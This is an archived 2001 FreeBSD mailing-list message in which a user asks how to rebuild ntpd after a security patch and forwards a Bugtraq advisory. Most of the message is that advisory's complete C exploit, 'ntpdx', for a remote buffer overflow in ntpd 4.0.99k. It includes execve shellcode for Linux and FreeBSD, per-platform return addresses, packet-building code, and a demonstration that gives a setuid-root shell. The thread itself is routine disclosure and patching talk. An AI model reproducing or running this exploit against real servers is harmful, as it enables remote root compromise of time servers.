From owner-freebsd-questions  Thu Apr  5  7:36:33 2001
Delivered-To: freebsd-questions@freebsd.org
Received: from ibis.worldnet.net (ibis.worldnet.net [195.3.3.14])
	by hub.freebsd.org (Postfix) with ESMTP id D2A7937B42C
	for <freebsd-questions@FreeBSD.org>; Thu,  5 Apr 2001 07:36:12 -0700 (PDT)
	(envelope-from vivelame@shyne.worldnet.net)
Received: from m3.worldnet.net (m2.worldnet.net [195.3.3.6])
	by ibis.worldnet.net (8.11.3/8.11.1) with ESMTP id f35EZvv42466;
	Thu, 5 Apr 2001 16:35:57 +0200 (CEST)
	(envelope-from vivelame@shyne.worldnet.net)
Received: from salegoth.shyne.worldnet.net (nat-srv1.kaptech.net [195.3.9.4])
	by m3.worldnet.net (8.11.2/8.11.1) with ESMTP id f35EaoP04677;
	Thu, 5 Apr 2001 16:36:50 +0200 (CEST)
	(envelope-from vivelame@shyne.worldnet.net)
Message-Id: <4.3.1.0.20010405163113.0bab4ef0@shyne.worldnet.net>
X-Sender: vivelame@shyne.worldnet.net
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Thu, 05 Apr 2001 16:39:21 +0200
To: freebsd-questions@FreeBSD.org
From: Brice Gensburger <vivelame@shyne.worldnet.net>
Subject: Re: xntpd/ntpd ?
Cc: "Doug Denault <doug@safeport.com> \"E. Jordan Bojar\"" <bojar@intersys.com>
In-Reply-To: <Pine.BSF.3.96.1010405093556.37240B-100000@fledge.watson.or
 g>
References: <4.3.1.0.20010405115143.0baa4140@mail.worldnet.net>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-questions@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.ORG

At 09:43 05/04/01 -0400, you wrote:
>ntp is in /usr/ports/net. At some point in 4.x it was moved to the base
>system.
>
> >From the thread in the security list, it seems to go back to 3.4. xntp is
>the older version(s), the name was changed along the way. I believe it is
>just a later version of David Mill's package. He may even be responsible
>for the name change.
>
>Patches and updates are being developed. In the meantime, if you are not
>testing a patch (like me :) ntpdate can be used in the mean time.
>
>On Thu, 5 Apr 2001, Brice Gensburger wrote:
>
> >       hi, i'm getting a little bit confused here...
> >
> > there's been a recent post on bugtraq regarding ntpd v4.
> >
> > most of my machines are FreeBSD 3.5, running xntpd.
> > some, through, are 4.2, running ntpd v4.
> > I can't find xntpd in the ports tree, while i remember seeing it a while
> > back (but it seems i was wrong..)
> > what happened to xntpd? :-)
> > and besides this, does someone have a few spare moments to explain briefly
> > to me the differences between ntpd and xntpd?
> >
> >
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe freebsd-questions" in the body of the message
> >

yup, i've seen the patch commited on FreeBSD-Stable...
but i just couldn't find how to rebuild just ntpd...

[oxygen][ntp]# pwd
/usr/src/contrib/ntp
[oxygen][ntp]# make install
make: don't know how to make install. Stop
[oxygen][ntp]# make all
make: don't know how to make all. Stop
[oxygen][ntp]# make clean
make: don't know how to make clean. Stop

obviously, i must be missing something  :-)


  asked the bugtraq post..
here it is:


Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
User-Agent: Mutt/1.2.5i
Date: Wed, 4 Apr 2001 22:27:01 +0200
Reply-To: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Subject: ntpd =< 4.0.99k remote buffer overflow
To: BUGTRAQ@SECURITYFOCUS.COM
/* ntpd remote root exploit / babcia padlina ltd. 
<venglin@freebsd.lublin.pl> */
/*
* Network Time Protocol Daemon (ntpd) shipped with many systems is vulnerable
* to remote buffer overflow attack. It occurs when building response for
* a query with large readvar argument. In almost all cases, ntpd is running
* with superuser privileges, allowing to gain REMOTE ROOT ACCESS to 
timeserver.
*
* Althought it's a normal buffer overflow, exploiting it is much harder.
* Destination buffer is accidentally damaged, when attack is performed, so
* shellcode can't be larger than approx. 70 bytes. This proof of concept code
* uses small execve() shellcode to run /tmp/sh binary. Full remote attack
* is possible.
*
* NTP is stateless UDP based protocol, so all malicious queries can be
* spoofed.
*
* Example of use on generic RedHat 7.0 box:
*
* [venglin@cipsko venglin]$ cat dupa.c
* main() { setreuid(0,0); system("chmod 4755 /bin/sh"); }
* [venglin@cipsko venglin]$ cc -o /tmp/sh dupa.c
* [venglin@cipsko venglin]$ cc -o ntpdx ntpdx.c
* [venglin@cipsko venglin]$ ./ntpdx -t2 localhost
* ntpdx v1.0 by venglin@freebsd.lublin.pl
*
* Selected platform: RedHat Linux 7.0 with ntpd 4.0.99k-RPM (/tmp/sh)
*
* RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query
* [1] <- evil query (pkt = 512 | shell = 45)
* [2] <- null query (pkt = 12)
* Done.
* /tmp/sh was spawned.
* [venglin@cipsko venglin]$ ls -al /bin/bash
* -rwsr-xr-x 1 root root 512540 Aug 22 2000 /bin/bash
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <arpa/inet.h>
#define NOP 0x90
#define ADDRS 8
#define PKTSIZ 512
static char usage[] = "usage: ntpdx [-o offset] <-t type> <hostname>";
/* generic execve() shellcodes */
char lin_execve[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/sh";
char bsd_execve[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
struct platforms
{
char *os;
char *version;
char *code;
long ret;
int align;
int shalign;
int port;
};
/* Platforms. Notice, that on FreeBSD shellcode must be placed in packet
* *after* RET address. This values will vary from platform to platform.
*/
struct platforms targ[] =
{
{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
0xbfbff8bc, 200, 220, 0 },
{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
0xbfbff540, 200, 220, 0 },
{ "RedHat Linux 7.0", "4.0.99k-RPM (/tmp/sh)", lin_execve,
0xbffff777, 240, 160, 0 },
{ NULL, NULL, NULL, 0x0, 0, 0, 0 }
};
long getip(name)
char *name;
{
struct hostent *hp;
long ip;
extern int h_errno;
if ((ip = inet_addr(name)) < 0)
{
if (!(hp = gethostbyname(name)))
{
fprintf(stderr, "gethostbyname(): %s\n",
strerror(h_errno));
exit(1);
}
memcpy(&ip, (hp->h_addr), 4);
}
return ip;
}
int doquery(host, ret, shellcode, align, shalign)
char *host, *shellcode;
long ret;
int align, shalign;
{
/* tcpdump-based reverse engineering :)) */
char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61,
0x74, 0x75, 0x6d, 0x3d };
char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00 };
char buf[PKTSIZ], *p;
long *ap;
int i;
int sockfd;
struct sockaddr_in sa;
bzero(&sa, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(123);
sa.sin_addr.s_addr = getip(host);
if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
{
perror("socket");
return -1;
}
if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0)
{
perror("connect");
close(sockfd);
return -1;
}
memset(buf, NOP, PKTSIZ);
memcpy(buf, q2, sizeof(q2));
p = buf + align;
ap = (unsigned long *)p;
for(i=0;i<ADDRS/4;i++)
*ap++ = ret;
p = (char *)ap;
memcpy(buf+shalign, shellcode, strlen(shellcode));
if((write(sockfd, buf, PKTSIZ)) < 0)
{
perror("write");
close(sockfd);
return -1;
}
fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ,
strlen(shellcode));
fflush(stderr);
if ((write(sockfd, q3, sizeof(q3))) < 0)
{
perror("write");
close(sockfd);
return -1;
}
fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3));
fflush(stderr);
close(sockfd);
return 0;
}
int main(argc, argv)
int argc;
char **argv;
{
extern int optind, opterr;
extern char *optarg;
int ch, type, ofs, i;
long ret;
opterr = ofs = 0;
type = -1;
while ((ch = getopt(argc, argv, "t:o:")) != -1)
switch((char)ch)
{
case 't':
type = atoi(optarg);
break;
case 'o':
ofs = atoi(optarg);
break;
case '?':
default:
puts(usage);
exit(0);
}
argc -= optind;
argv += optind;
fprintf(stderr, "ntpdx v1.0 by venglin@freebsd.lublin.pl\n\n");
if (type < 0)
{
fprintf(stderr, "Please select platform:\n");
for (i=0;targ[i].os;i++)
{
fprintf(stderr, "\t-t %d : %s %s (%p)\n", i,
targ[i].os, targ[i].version, (void *)targ[i].ret);
}
exit(0);
}
fprintf(stderr, "Selected platform: %s with ntpd %s\n\n",
targ[type].os, targ[type].version);
ret = targ[type].ret;
ret += ofs;
if (argc != 1)
{
puts(usage);
exit(0);
}
fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending query\n",
(void *)ret, targ[type].align, targ[type].shalign);
if (doquery(*argv, ret, targ[type].code, targ[type].align,
targ[type].shalign) < 0)
{
fprintf(stderr, "Failed.\n");
exit(1);
}
fprintf(stderr, "Done.\n");
if (!targ[type].port)
{
fprintf(stderr, "/tmp/sh was spawned.\n");
exit(0);
}
exit(0);
}
--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message